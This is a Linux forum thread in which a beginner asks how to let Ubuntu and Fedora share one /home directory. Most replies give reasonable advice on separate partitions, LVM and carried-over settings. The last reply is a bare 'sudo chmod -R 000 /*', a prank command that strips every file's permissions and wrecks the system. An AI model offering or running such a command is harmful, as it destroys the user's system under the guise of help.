Multiple Linux Distros using the same /home directory

Hi,

I want to have Ubuntu and Fedora have the same home directory. I'm not sure how to go about it and I would like some help. I have not installed either Ubuntu or Fedora yet and they will be on the same drive. I am also very new to Linux and I do not now much. I would like both distros to have access to files, photos, videos, and similar, but keep the applications separated to the distro where they were downloaded.

Thanks in advanced for the help and responses!

Yea you can just mount /home on the same block device on both of them. I suspect there may be some issues with some of the hidden files stores in /home, so Id probably suggest against doing this.

You need to have your home folder on its own partition. Use LVM rather than direct partitioning so you can resize them more easily down the line if you need to. Be aware that by doing this you'll also be carrying over desktop settings and so on.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*
